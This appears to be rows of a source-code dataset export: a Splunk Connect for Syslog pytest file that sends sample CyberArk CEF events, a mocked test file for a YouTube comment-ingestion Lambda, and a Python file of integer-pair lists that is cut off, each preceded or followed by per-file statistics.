| 14,090
| 4.842342
| 0.102477
| 0.030698
| 0.033488
| 0.037209
| 0.845233
| 0.841628
| 0.828023
| 0.823953
| 0.803837
| 0.803837
| 0
| 0.011546
| 0.243932
| 14,090
| 387
| 157
| 36.408269
| 0.795738
| 0.056068
| 0
| 0.744108
| 0
| 0.013468
| 0.245819
| 0.020265
| 0
| 0
| 0
| 0
| 0
| 1
| 0.016835
| false
| 0
| 0.03367
| 0
| 0.050505
| 0.063973
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
f4376cee06201700e770ec5750613274e9295058
| 5,448
|
py
|
Python
|
tests/test_cyberark.py
|
ccDev-Labs/splunk-connect-for-syslog
|
2b30c711b4e53135444b485623bfc610ac2f19e2
|
[
"BSD-2-Clause",
"CC0-1.0"
] | null | null | null |
tests/test_cyberark.py
|
ccDev-Labs/splunk-connect-for-syslog
|
2b30c711b4e53135444b485623bfc610ac2f19e2
|
[
"BSD-2-Clause",
"CC0-1.0"
] | null | null | null |
tests/test_cyberark.py
|
ccDev-Labs/splunk-connect-for-syslog
|
2b30c711b4e53135444b485623bfc610ac2f19e2
|
[
"BSD-2-Clause",
"CC0-1.0"
] | null | null | null |
# Copyright 2019 Splunk, Inc.
#
# Use of this source code is governed by a BSD-2-clause-style
# license that can be found in the LICENSE-BSD2 file or at
# https://opensource.org/licenses/BSD-2-Clause
import random
from jinja2 import Environment
from .sendmessage import *
from .splunkutils import *
from .timeutils import *
env = Environment()
#<5>1 2020-01-24T22:53:03Z REDACTEDHOSTNAME CEF:0|Cyber-Ark|Vault|10.9.0000|22|CPM Verify Password|5|act="CPM Verify Password" suser=PasswordManager fname=Root\Operating System-OBO-ISSO-Windows-Domain-Account-redacted dvc= shost=10.0.0.10 dhost= duser=redacted externalId= app= reason= cs1Label="Affected User Name" cs1= cs2Label="Safe Name" cs2="re-dact-ted" cs3Label="Device Type" cs3="Operating System" cs4Label="Database" cs4= cs5Label="Other info" cs5= cn1Label="Request Id" cn1= cn2Label="Ticket Id" cn2="VerificationPeriod" msg="VerificationPeriod"
def test_cyberark_epv_5424(record_property, setup_wordlist, setup_splunk, setup_sc4s):
host = "{}-{}".format(random.choice(setup_wordlist), random.choice(setup_wordlist))
dt = datetime.datetime.now(datetime.timezone.utc)
iso, bsd, time, date, tzoffset, tzname, epoch = time_operations(dt)
# Tune time functions
iso = dt.isoformat()[0:19]
epoch = epoch[:-7]
mt = env.from_string(
"{{ mark }}1 {{ iso }}Z {{ host }} CEF:0|Cyber-Ark|Vault|9.20.0000|7|Logon|5|act=\"Logon\" suser=PasswordManager fname= dvc= shost=10.0.0.10 dhost= duser= externalId= app= reason= cs1Label=\"Affected User Name\" cs1= cs2Label=\"Safe Name\" cs2= cs3Label=\"Device Type\" cs3=11111 cs4Label=\"Database\" cs4=222222 cs5Label=\"Other info\" cs5= cn1Label=\"Request Id\" cn1= cn2Label=\"Ticket Id\" cn2= msg=\n")
message = mt.render(mark="<111>", iso=iso, host=host)
sendsingle(message, setup_sc4s[0], setup_sc4s[1][514])
st = env.from_string("search _time={{ epoch }} index=netauth host=\"{{ host }}\" sourcetype=\"cyberark:epv:cef\"| head 2")
search = st.render(epoch=epoch, host=host)
resultCount, eventCount = splunk_single(setup_splunk, search)
record_property("host", host)
record_property("resultCount", resultCount)
record_property("message", message)
assert resultCount == 1
#<190>Jul 27 23:31:58 VAULT CEF:0|Cyber-Ark|Vault|9.20.0000|7|Logon|5|act="Logon" suser=user2 fname= dvc= shost=127.0.0.1 dhost= duser= externalId= app= reason= cs1Label="Affected User Name" cs1= cs2Label="Safe Name" cs2= cs3Label="Device Type" cs3=11111 cs4Label="Database" cs4=222222 cs5Label="Other info" cs5= cn1Label="Request Id" cn1= cn2Label="Ticket Id" cn2= msg=
def test_cyberark_epv(record_property, setup_wordlist, setup_splunk, setup_sc4s):
host = "{}-{}".format(random.choice(setup_wordlist), random.choice(setup_wordlist))
dt = datetime.datetime.now()
iso, bsd, time, date, tzoffset, tzname, epoch = time_operations(dt)
# Tune time functions
epoch = epoch[:-7]
mt = env.from_string(
"{{ mark }}{{ bsd }} {{ host }} CEF:0|Cyber-Ark|Vault|9.20.0000|7|Logon|5|act=\"Logon\" suser=user2 fname= dvc= shost=127.0.0.1 dhost= duser= externalId= app= reason= cs1Label=\"Affected User Name\" cs1= cs2Label=\"Safe Name\" cs2= cs3Label=\"Device Type\" cs3=11111 cs4Label=\"Database\" cs4=222222 cs5Label=\"Other info\" cs5= cn1Label=\"Request Id\" cn1= cn2Label=\"Ticket Id\" cn2= msg=\n")
message = mt.render(mark="<111>", bsd=bsd, host=host)
sendsingle(message, setup_sc4s[0], setup_sc4s[1][514])
st = env.from_string("search _time={{ epoch }} index=netauth host=\"{{ host }}\" sourcetype=\"cyberark:epv:cef\"| head 2")
search = st.render(epoch=epoch, host=host)
resultCount, eventCount = splunk_single(setup_splunk, search)
record_property("host", host)
record_property("resultCount", resultCount)
record_property("message", message)
assert resultCount == 1
#<190>Jul 12 23:44:25 10.0.0.1 CEF:0|CyberArk|PTA|2.6.1|20|Privileged account anomaly|8|cs1Label=incidentId cs1=55a32ed8e4b0e4a90114e12c start=1436755482000 deviceCustomDate1Label=detectionDate deviceCustomDate1=1436759065017 msg=Incident updated. Now contains 7 anomalies cs2Label=link cs2=https://10.0.0.1/incidents/55a32ed8e4b0e4a90114e12c
def test_cyberark_pta(record_property, setup_wordlist, setup_splunk, setup_sc4s):
host = "{}-{}".format(random.choice(setup_wordlist), random.choice(setup_wordlist))
dt = datetime.datetime.now()
iso, bsd, time, date, tzoffset, tzname, epoch = time_operations(dt)
# Tune time functions
epoch = epoch[:-7]
mt = env.from_string(
"{{ mark }}{{ bsd }} {{ host }} CEF:0|CyberArk|PTA|2.6.1|20|Privileged account anomaly|8|cs1Label=incidentId cs1=55a32ed8e4b0e4a90114e12c start=1436755482000 deviceCustomDate1Label=detectionDate deviceCustomDate1=1436759065017 msg=Incident updated. Now contains 7 anomalies cs2Label=link cs2=https://10.0.0.1/incidents/55a32ed8e4b0e4a90114e12c\n")
message = mt.render(mark="<111>", bsd=bsd, host=host)
sendsingle(message, setup_sc4s[0], setup_sc4s[1][514])
st = env.from_string("search _time={{ epoch }} index=main host=\"{{ host }}\" sourcetype=\"cyberark:pta:cef\"| head 2")
search = st.render(epoch=epoch, host=host)
resultCount, eventCount = splunk_single(setup_splunk, search)
record_property("host", host)
record_property("resultCount", resultCount)
record_property("message", message)
assert resultCount == 1
| 56.164948
| 556
| 0.720631
| 760
| 5,448
| 5.089474
| 0.259211
| 0.043433
| 0.02637
| 0.03878
| 0.814116
| 0.809721
| 0.809721
| 0.809721
| 0.792141
| 0.792141
| 0
| 0.085901
| 0.130323
| 5,448
| 96
| 557
| 56.75
| 0.730477
| 0.278084
| 0
| 0.709091
| 0
| 0.090909
| 0.312165
| 0.070645
| 0
| 0
| 0
| 0
| 0.054545
| 1
| 0.054545
| false
| 0.018182
| 0.090909
| 0
| 0.145455
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
be3babd13907177ef23fa4feb24fa32d28a78f05
| 19,330
|
py
|
Python
|
source/lambda/ingestion-youtube/test/test_comment.py
|
swipswaps/discovering-hot-topics-using-machine-learning
|
6de8b4670e5a00ad5bf2eb7c27895241d4ea95bf
|
[
"Apache-2.0"
] | null | null | null |
source/lambda/ingestion-youtube/test/test_comment.py
|
swipswaps/discovering-hot-topics-using-machine-learning
|
6de8b4670e5a00ad5bf2eb7c27895241d4ea95bf
|
[
"Apache-2.0"
] | null | null | null |
source/lambda/ingestion-youtube/test/test_comment.py
|
swipswaps/discovering-hot-topics-using-machine-learning
|
6de8b4670e5a00ad5bf2eb7c27895241d4ea95bf
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/env python
######################################################################################################################
# Copyright Amazon.com, Inc. or its affiliates. All Rights Reserved. #
# #
# Licensed under the Apache License, Version 2.0 (the "License"). You may not use this file except in compliance #
# with the License. A copy of the License is located at #
# #
# http://www.apache.org/licenses/LICENSE-2.0 #
# #
# or in the 'license' file accompanying this file. This file is distributed on an 'AS IS' BASIS, WITHOUT WARRANTIES #
# OR CONDITIONS OF ANY KIND, express or implied. See the License for the specific language governing permissions #
# and limitations under the License. #
######################################################################################################################
import json
import os
from datetime import datetime, timedelta, timezone
from test.test_credential_helper import ssm_setup
from test.test_ddb_helper import ddb_setup
from test.test_stream_helper import stream_setup
from unittest.mock import patch
from moto import mock_dynamodb2, mock_kinesis, mock_ssm
from util.comment import Comment, search_comments, slice_text_into_arrays
api_response_time_format = "%Y-%m-%dT%H:%M:%SZ"
@mock_ssm
@mock_kinesis
@mock_dynamodb2
@patch("util.comment.get_youtube_service_resource")
def test_search_comments(mock_youtube_resource):
api_key = "fakeapikey"
ssm_setup(api_key)
ddb_setup(os.environ["TARGET_DDB_TABLE"])
kds_client = stream_setup(os.environ["STREAM_NAME"])
video_id = "fakeVideoId"
event = {
"version": "0",
"id": "fakeID",
"detailtype": "Video",
"source": "com.youtube.video",
"account": "fakeaccount",
"time": "2020-06-13T23:14:19Z",
"region": "us-east-1",
"resources": [],
"detail": {"VideoId": video_id, "SearchQuery": "fakeQuery", "Title": "fakeTitle"},
}
mock_youtube_resource.return_value.commentThreads.return_value.list.return_value.execute.return_value = {
"items": [
{
"id": "fakeId",
"kind": "youtube#commentThread",
"snippet": {
"topLevelComment": {
"id": "fakeCommentId",
"kind": "youtube#comment",
"snippet": {
"publishedAt": "2021-08-12T22:34:33Z",
"textDisplay": "Omg " "love " "it",
"textOriginal": "Omg " "love " "it",
"updatedAt": "2021-08-12T22:34:33Z",
"videoId": video_id,
"viewerRating": 2,
"likeCount": 0,
"updatedAt": datetime.now(timezone.utc).strftime(api_response_time_format),
},
},
"videoId": video_id,
},
}
],
"kind": "youtube#commentThreadListResponse",
"pageInfo": {"resultsPerPage": 100, "totalResults": 1},
"nextPageToken": None,
}
assert None == search_comments(event)
@mock_ssm
@mock_kinesis
@mock_dynamodb2
@patch("util.comment.get_youtube_service_resource")
def test_search_comments_with_tracker_date(mock_youtube_resource):
api_key = "fakeapikey"
ssm_setup(api_key)
table_name = os.environ["TARGET_DDB_TABLE"]
ddb = ddb_setup(table_name)
video_id = "fakeVideoId"
current_time = datetime.now(timezone.utc)
expiry_window = str(
int((current_time + timedelta(days=int(os.environ.get("VIDEO_SEARCH_INGESTION_WINDOW", 7)))).timestamp() * 1000)
)
ddb_item = {
"VIDEO_ID": video_id,
"LAST_QUERIED_TIMESTAMP": (current_time - timedelta(days=2)).isoformat(),
"EXP_DATE": {"N": expiry_window},
}
table = ddb.Table(table_name)
table.put_item(Item=ddb_item)
kds_client = stream_setup(os.environ["STREAM_NAME"])
event = {
"version": "0",
"id": "fakeID",
"detailtype": "Video",
"source": "com.youtube.video",
"account": "fakeaccount",
"time": "2020-06-13T23:14:19Z",
"region": "us-east-1",
"resources": [],
"detail": {"VideoId": video_id, "SearchQuery": "fakeQuery", "Title": "fakeTitle"},
}
mock_youtube_resource.return_value.commentThreads.return_value.list.return_value.execute.return_value = {
"items": [
{
"id": "fakeId",
"kind": "youtube#commentThread",
"snippet": {
"topLevelComment": {
"id": "fakeCommentId",
"kind": "youtube#comment",
"snippet": {
"publishedAt": "2021-08-12T22:34:33Z",
"textDisplay": "Omg " "love " "it",
"textOriginal": "Omg " "love " "it",
"updatedAt": "2021-08-12T22:34:33Z",
"videoId": video_id,
"viewerRating": 2,
"likeCount": 0,
"updatedAt": datetime.now(timezone.utc).strftime(api_response_time_format),
},
},
"videoId": video_id,
},
}
],
"kind": "youtube#commentThreadListResponse",
"pageInfo": {"resultsPerPage": 100, "totalResults": 1},
"nextPageToken": None,
}
assert None == search_comments(event)
@mock_ssm
@mock_kinesis
@mock_dynamodb2
@patch("util.comment.get_youtube_service_resource")
def test_search_comments_with_page_token(mock_youtube_resource):
api_key = "fakeapikey"
ssm_setup(api_key)
table_name = os.environ["TARGET_DDB_TABLE"]
ddb = ddb_setup(table_name)
video_id = "fakeVideoId"
current_time = datetime.now(timezone.utc)
expiry_window = str(
int((current_time + timedelta(days=int(os.environ.get("VIDEO_SEARCH_INGESTION_WINDOW", 7)))).timestamp() * 1000)
)
ddb_item = {
"VIDEO_ID": video_id,
"LAST_QUERIED_TIMESTAMP": (current_time - timedelta(days=2)).isoformat(),
"EXP_DATE": {"N": expiry_window},
}
table = ddb.Table(table_name)
table.put_item(Item=ddb_item)
kds_client = stream_setup(os.environ["STREAM_NAME"])
event = {
"version": "0",
"id": "fakeID",
"detailtype": "Video",
"source": "com.youtube.video",
"account": "fakeaccount",
"time": "2020-06-13T23:14:19Z",
"region": "us-east-1",
"resources": [],
"detail": {"VideoId": video_id, "SearchQuery": "fakeQuery", "Title": "fakeTitle"},
}
mock_youtube_resource.return_value.commentThreads.return_value.list.return_value.execute.side_effect = [
{
"items": [
{
"id": "fakeId",
"kind": "youtube#commentThread",
"snippet": {
"topLevelComment": {
"id": "fakeCommentId",
"kind": "youtube#comment",
"snippet": {
"textDisplay": "Omg " "love " "it",
"textOriginal": "Omg " "love " "it",
"videoId": video_id,
"viewerRating": 2,
"likeCount": 0,
"publishedAt": datetime.now(timezone.utc).strftime(api_response_time_format),
"updatedAt": datetime.now(timezone.utc).strftime(api_response_time_format),
},
},
"videoId": video_id,
},
}
],
"kind": "youtube#commentThreadListResponse",
"pageInfo": {"resultsPerPage": 100, "totalResults": 1},
"nextPageToken": "fakeToken",
},
{
"items": [
{
"id": "fakeId",
"kind": "youtube#commentThread",
"snippet": {
"topLevelComment": {
"id": "fakeCommentId",
"kind": "youtube#comment",
"snippet": {
"textDisplay": "Omg " "love " "it",
"textOriginal": "Omg " "love " "it",
"videoId": video_id,
"viewerRating": 2,
"likeCount": 0,
"publishedAt": datetime.now(timezone.utc).strftime(api_response_time_format),
"updatedAt": datetime.now(timezone.utc).strftime(api_response_time_format),
},
},
"videoId": video_id,
},
}
],
"kind": "youtube#commentThreadListResponse",
"pageInfo": {"resultsPerPage": 100, "totalResults": 1},
"nextPageToken": None,
},
]
assert None == search_comments(event)
@mock_ssm
@mock_kinesis
@mock_dynamodb2
@patch("util.comment.get_youtube_service_resource")
def test_search_comments_with_replies(mock_youtube_resource):
api_key = "fakeapikey"
ssm_setup(api_key)
table_name = os.environ["TARGET_DDB_TABLE"]
ddb = ddb_setup(table_name)
video_id = "fakeVideoId"
current_time = datetime.now(timezone.utc)
expiry_window = str(
int((current_time + timedelta(days=int(os.environ.get("VIDEO_SEARCH_INGESTION_WINDOW", 7)))).timestamp() * 1000)
)
ddb_item = {
"VIDEO_ID": video_id,
"LAST_QUERIED_TIMESTAMP": (current_time - timedelta(days=2)).isoformat(),
"EXP_DATE": {"N": expiry_window},
}
table = ddb.Table(table_name)
table.put_item(Item=ddb_item)
stream_setup(os.environ["STREAM_NAME"])
event = {
"version": "0",
"id": "fakeID",
"detailtype": "Video",
"source": "com.youtube.video",
"account": "fakeaccount",
"time": "2020-06-13T23:14:19Z",
"region": "us-east-1",
"resources": [],
"detail": {"VideoId": video_id, "SearchQuery": "fakeQuery", "Title": "fakeTitle"},
}
mock_youtube_resource.return_value.commentThreads.return_value.list.return_value.execute.return_value = {
"items": [
{
"id": "fakeId",
"kind": "youtube#commentThread",
"snippet": {
"topLevelComment": {
"id": "fakeCommentId",
"kind": "youtube#comment",
"snippet": {
"textDisplay": "Omg " "love " "it",
"textOriginal": "Omg " "love " "it",
"videoId": video_id,
"viewerRating": 2,
"likeCount": 0,
"publishedAt": datetime.now(timezone.utc).strftime(api_response_time_format),
"updatedAt": datetime.now(timezone.utc).strftime(api_response_time_format),
},
},
"videoId": video_id,
},
"replies": {
"comments": [
{
"id": "fakeCommentId#fakeCommentId",
"kind": "youtube#comment",
"snippet": {
"textDisplay": "Omg " "love " "it",
"textOriginal": "Omg " "love " "it",
"videoId": video_id,
"viewerRating": 2,
"likeCount": 0,
"publishedAt": datetime.now(timezone.utc).strftime(api_response_time_format),
"updatedAt": datetime.now(timezone.utc).strftime(api_response_time_format),
},
}
]
},
}
],
"kind": "youtube#commentThreadListResponse",
"pageInfo": {"resultsPerPage": 100, "totalResults": 1},
"nextPageToken": None,
}
assert None == search_comments(event)
@mock_ssm
@mock_kinesis
@mock_dynamodb2
@patch("util.comment.get_youtube_service_resource")
def test_search_comments_not_publishing_record(mock_youtube_resource):
api_key = "fakeapikey"
ssm_setup(api_key)
table_name = os.environ["TARGET_DDB_TABLE"]
ddb = ddb_setup(table_name)
video_id = "fakeVideoId"
current_time = datetime.now(timezone.utc)
expiry_window = str(
int((current_time + timedelta(days=int(os.environ.get("VIDEO_SEARCH_INGESTION_WINDOW", 7)))).timestamp() * 1000)
)
ddb_item = {
"VIDEO_ID": video_id,
"LAST_QUERIED_TIMESTAMP": current_time.isoformat(),
"EXP_DATE": {"N": expiry_window},
}
table = ddb.Table(table_name)
table.put_item(Item=ddb_item)
# stream_setup(os.environ["STREAM_NAME"])
event = {
"version": "0",
"id": "fakeID",
"detailtype": "Video",
"source": "com.youtube.video",
"account": "fakeaccount",
"time": "2020-06-13T23:14:19Z",
"region": "us-east-1",
"resources": [],
"detail": {"VideoId": video_id, "SearchQuery": "fakeQuery", "Title": "fakeTitle"},
}
mock_youtube_resource.return_value.commentThreads.return_value.list.return_value.execute.return_value = {
"items": [
{
"id": "fakeId",
"kind": "youtube#commentThread",
"snippet": {
"topLevelComment": {
"id": "fakeCommentId",
"kind": "youtube#comment",
"snippet": {
"textDisplay": "Omg " "love " "it",
"textOriginal": "Omg " "love " "it",
"videoId": video_id,
"viewerRating": 2,
"likeCount": 0,
"publishedAt": (current_time - timedelta(days=3)).strftime(api_response_time_format),
"updatedAt": (current_time - timedelta(days=2)).strftime(api_response_time_format),
},
},
"videoId": video_id,
},
}
],
"kind": "youtube#commentThreadListResponse",
"pageInfo": {"resultsPerPage": 100, "totalResults": 1},
"nextPageToken": None,
}
assert None == search_comments(event)
@mock_ssm
@mock_kinesis
@mock_dynamodb2
@patch("util.comment.get_youtube_service_resource")
def test_search_comments_with_api_throws_error(mock_youtube_resource):
api_key = "fakeapikey"
ssm_setup(api_key)
ddb_setup(os.environ["TARGET_DDB_TABLE"])
kds_client = stream_setup(os.environ["STREAM_NAME"])
video_id = "fakeVideoId"
event = {
"version": "0",
"id": "fakeID",
"detailtype": "Video",
"source": "com.youtube.video",
"account": "fakeaccount",
"time": "2020-06-13T23:14:19Z",
"region": "us-east-1",
"resources": [],
"detail": {"VideoId": video_id, "SearchQuery": "fakeQuery", "Title": "fakeTitle"},
}
import googleapiclient.errors
import mock
mock_youtube_resource.return_value.commentThreads.return_value.list.return_value.execute.side_effect = (
googleapiclient.errors.HttpError(mock.Mock(status=403), "Error invoking API".encode("utf-8"))
)
assert None == search_comments(event)
def test_update_text_comment():
current_time = datetime.now(timezone.utc)
comment = Comment(
{
"id": "fakeCommentId",
"kind": "youtube#comment",
"snippet": {
"textDisplay": "Fake Text",
"textOriginal": "Fake Text",
"videoId": "fakeVideoId",
"viewerRating": 2,
"likeCount": 0,
"publishedAt": (current_time - timedelta(days=3)).strftime(api_response_time_format),
"updatedAt": (current_time - timedelta(days=2)).strftime(api_response_time_format),
},
}
)
updated_text = "new fake text"
new_comment = comment.update_comment_text(updated_text)
assert updated_text == new_comment.text
assert new_comment.comment_id == comment.comment_id
assert new_comment.viewer_rating == comment.viewer_rating
new_comment = comment.update_comment_text(updated_text, 2)
assert new_comment.comment_id == f"{comment.comment_id}#2"
def test_get_split_comments():
current_time = datetime.now(timezone.utc)
comment_text = ""
for index in range(500):
comment_text += "Lorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. "
comment = Comment(
{
"id": "fakeCommentId",
"kind": "youtube#comment",
"snippet": {
"textDisplay": "Fake Text",
"textOriginal": comment_text,
"videoId": "fakeVideoId",
"viewerRating": 2,
"likeCount": 0,
"publishedAt": (current_time - timedelta(days=3)).strftime(api_response_time_format),
"updatedAt": (current_time - timedelta(days=2)).strftime(api_response_time_format),
},
}
)
split_comment = comment.get_split_comments()
assert len(split_comment) > 10
split_text = slice_text_into_arrays(comment_text)
assert split_text[1] == split_comment[1].text
def test_slice_text_into_arrays():
comment_text = ""
for index in range(500):
comment_text += "Lorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. "
split_comment_text = slice_text_into_arrays(comment_text)
assert split_comment_text[0] == comment_text[0:1250]
assert split_comment_text[1] == comment_text[1250:2500]
assert split_comment_text[2] == comment_text[2500:3750]
assert comment_text == "".join(split_comment_text)
| 37.388781
| 150
| 0.509933
| 1,722
| 19,330
| 5.486643
| 0.144019
| 0.02445
| 0.028154
| 0.037786
| 0.848116
| 0.839754
| 0.837743
| 0.830758
| 0.821232
| 0.811706
| 0
| 0.02204
| 0.356855
| 19,330
| 516
| 151
| 37.46124
| 0.737934
| 0.063114
| 0
| 0.735023
| 0
| 0.004608
| 0.245015
| 0.046101
| 0
| 0
| 0
| 0
| 0.036866
| 1
| 0.020737
| false
| 0
| 0.025346
| 0
| 0.046083
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
be6e4da3e4118bfced5eaaa8b3c591c341c2fa31
| 102,012
|
py
|
Python
|
MBG.py
|
mathmanda/SGTCode
|
fc4c6591e8c6ab190a15e029493562bb9cab3fee
|
[
"MIT"
] | null | null | null |
MBG.py
|
mathmanda/SGTCode
|
fc4c6591e8c6ab190a15e029493562bb9cab3fee
|
[
"MIT"
] | null | null | null |
MBG.py
|
mathmanda/SGTCode
|
fc4c6591e8c6ab190a15e029493562bb9cab3fee
|
[
"MIT"
] | null | null | null |
mb = [[1 , 19],[ 1 , 20],[ 1 , 21],[ 1 , 22],[ 1 , 23],[ 1 , 24],[ 1 , 25],[ 1 , 26],[ 1 , 27],[ 1 , 28],[ 2 , 19],[ 2 , 20],[ 2 , 21],[ 2 , 22],[ 2 , 23],[ 2 , 24],[ 2 , 25],[ 2 , 26],[ 2 , 27],[ 2 , 28],[ 3 , 19],[ 3 , 20],[ 3 , 21],[ 3 , 22],[ 3 , 29],[ 3 , 30],[ 3 , 31],[ 3 , 32],[ 3 , 33],[ 3 , 34],[ 4 , 19],[ 4 , 20],[ 4 , 21],[ 4 , 22],[ 4 , 29],[ 4 , 30],[ 4 , 31],[ 4 , 32],[ 4 , 33],[ 4 , 34],[ 5 , 19],[ 5 , 20],[ 5 , 21],[ 5 , 22],[ 5 , 29],[ 5 , 30],[ 5 , 31],[ 5 , 32],[ 5 , 33],[ 5 , 34],[ 6 , 19],[ 6 , 23],[ 6 , 24],[ 6 , 25],[ 6 , 29],[ 6 , 30],[ 6 , 31],[ 6 , 35],[ 6 , 36],[ 6 , 37],[ 7 , 19],[ 7 , 23],[ 7 , 24],[ 7 , 25],[ 7 , 29],[ 7 , 30],[ 7 , 31],[ 7 , 35],[ 7 , 36],[ 7 , 37],[ 8 , 19],[ 8 , 23],[ 8 , 24],[ 8 , 25],[ 8 , 29],[ 8 , 30],[ 8 , 31],[ 8 , 35],[ 8 , 36],[ 8 , 37],[ 9 , 20],[ 9 , 23],[ 9 , 26],[ 9 , 27],[ 9 , 29],[ 9 , 32],[ 9 , 33],[ 9 , 35],[ 9 , 36],[ 9 , 38],[ 10 , 20],[ 10 , 23],[ 10 , 26],[ 10 , 27],[ 10 , 29],[ 10 , 32],[ 10 , 33],[ 10 , 35],[ 10 , 36],[ 10 , 38],[ 11 , 20],[ 11 , 23],[ 11 , 26],[ 11 , 27],[ 11 , 29],[ 11 , 32],[ 11 , 33],[ 11 , 35],[ 11 , 36],[ 11 , 38],[ 12 , 20],[ 12 , 23],[ 12 , 26],[ 12 , 27],[ 12 , 29],[ 12 , 32],[ 12 , 33],[ 12 , 35],[ 12 , 36],[ 12 , 38],[ 13 , 21],[ 13 , 24],[ 13 , 26],[ 13 , 28],[ 13 , 30],[ 13 , 32],[ 13 , 34],[ 13 , 35],[ 13 , 37],[ 13 , 38],[ 14 , 21],[ 14 , 24],[ 14 , 26],[ 14 , 28],[ 14 , 30],[ 14 , 32],[ 14 , 34],[ 14 , 35],[ 14 , 37],[ 14 , 38],[ 15 , 21],[ 15 , 24],[ 15 , 26],[ 15 , 28],[ 15 , 30],[ 15 , 32],[ 15 , 34],[ 15 , 35],[ 15 , 37],[ 15 , 38],[ 16 , 22],[ 16 , 25],[ 16 , 27],[ 16 , 28],[ 16 , 31],[ 16 , 33],[ 16 , 34],[ 16 , 36],[ 16 , 37],[ 16 , 38],[ 17 , 22],[ 17 , 25],[ 17 , 27],[ 17 , 28],[ 17 , 31],[ 17 , 33],[ 17 , 34],[ 17 , 36],[ 17 , 37],[ 17 , 38],[ 18 , 22],[ 18 , 25],[ 18 , 27],[ 18 , 28],[ 18 , 31],[ 18 , 33],[ 18 , 34],[ 18 , 36],[ 18 , 37],[ 18 , 38]],[ [1 , 12],[ 1 , 13],[ 1 , 14],[ 1 , 15],[ 1 , 22],[ 1 , 23],[ 1 , 24],[ 1 , 25],[ 1 , 26],[ 1 , 27],[ 2 , 12],[ 2 , 16],[ 2 , 17],[ 2 , 18],[ 2 , 22],[ 2 , 23],[ 2 , 24],[ 2 , 28],[ 2 , 29],[ 2 , 30],[ 3 , 12],[ 3 , 16],[ 3 , 17],[ 3 , 18],[ 3 , 22],[ 3 , 23],[ 3 , 24],[ 3 , 28],[ 3 , 29],[ 3 , 30],[ 4 , 12],[ 4 , 16],[ 4 , 17],[ 4 , 18],[ 4 , 22],[ 4 , 23],[ 4 , 24],[ 4 , 28],[ 4 , 29],[ 4 , 30],[ 5 , 13],[ 5 , 16],[ 5 , 19],[ 5 , 20],[ 5 , 22],[ 5 , 25],[ 5 , 26],[ 5 , 28],[ 5 , 29],[ 5 , 31],[ 6 , 13],[ 6 , 16],[ 6 , 19],[ 6 , 20],[ 6 , 22],[ 6 , 25],[ 6 , 26],[ 6 , 28],[ 6 , 29],[ 6 , 31],[ 7 , 13],[ 7 , 16],[ 7 , 19],[ 7 , 20],[ 7 , 22],[ 7 , 25],[ 7 , 26],[ 7 , 28],[ 7 , 29],[ 7 , 31],[ 8 , 14],[ 8 , 17],[ 8 , 19],[ 8 , 21],[ 8 , 23],[ 8 , 25],[ 8 , 27],[ 8 , 28],[ 8 , 30],[ 8 , 31],[ 9 , 15],[ 9 , 18],[ 9 , 20],[ 9 , 21],[ 9 , 24],[ 9 , 26],[ 9 , 27],[ 9 , 29],[ 9 , 30],[ 9 , 31],[ 10 , 15],[ 10 , 18],[ 10 , 20],[ 10 , 21],[ 10 , 24],[ 10 , 26],[ 10 , 27],[ 10 , 29],[ 10 , 30],[ 10 , 31],[ 11 , 15],[ 11 , 18],[ 11 , 20],[ 11 , 21],[ 11 , 24],[ 11 , 26],[ 11 , 27],[ 11 , 29],[ 11 , 30],[ 11 , 31]],[ [1 , 23],[ 1 , 24],[ 1 , 25],[ 1 , 26],[ 1 , 27],[ 1 , 28],[ 1 , 29],[ 1 , 30],[ 1 , 31],[ 1 , 32],[ 2 , 23],[ 2 , 24],[ 2 , 25],[ 2 , 26],[ 2 , 27],[ 2 , 28],[ 2 , 29],[ 2 , 30],[ 2 , 31],[ 2 , 32],[ 3 , 23],[ 3 , 24],[ 3 , 25],[ 3 , 26],[ 3 , 27],[ 3 , 28],[ 3 , 29],[ 3 , 30],[ 3 , 31],[ 3 , 32],[ 4 , 23],[ 4 , 24],[ 4 , 25],[ 4 , 26],[ 4 , 27],[ 4 , 28],[ 4 , 29],[ 4 , 30],[ 4 , 31],[ 4 , 32],[ 5 , 23],[ 5 , 24],[ 5 , 25],[ 5 , 26],[ 5 , 33],[ 5 , 34],[ 5 , 35],[ 5 , 36],[ 5 , 37],[ 5 , 38],[ 6 , 23],[ 6 , 24],[ 6 , 25],[ 6 , 26],[ 6 , 33],[ 6 , 34],[ 6 , 35],[ 6 , 36],[ 6 , 37],[ 6 , 38],[ 7 , 23],[ 7 , 24],[ 7 , 25],[ 7 , 26],[ 7 , 33],[ 7 , 34],[ 7 , 35],[ 7 , 36],[ 7 , 37],[ 7 , 38],[ 8 , 23],[ 8 , 24],[ 8 , 25],[ 8 , 26],[ 8 , 33],[ 8 , 34],[ 8 , 35],[ 8 , 36],[ 8 , 37],[ 8 , 38],[ 9 , 23],[ 9 , 27],[ 9 , 28],[ 9 , 29],[ 9 , 33],[ 9 , 34],[ 9 , 35],[ 9 , 39],[ 9 , 40],[ 9 , 41],[ 10 , 23],[ 10 , 27],[ 10 , 28],[ 10 , 29],[ 10 , 33],[ 10 , 34],[ 10 , 35],[ 10 , 39],[ 10 , 40],[ 10 , 41],[ 11 , 23],[ 11 , 27],[ 11 , 28],[ 11 , 29],[ 11 , 33],[ 11 , 34],[ 11 , 35],[ 11 , 39],[ 11 , 40],[ 11 , 41],[ 12 , 23],[ 12 , 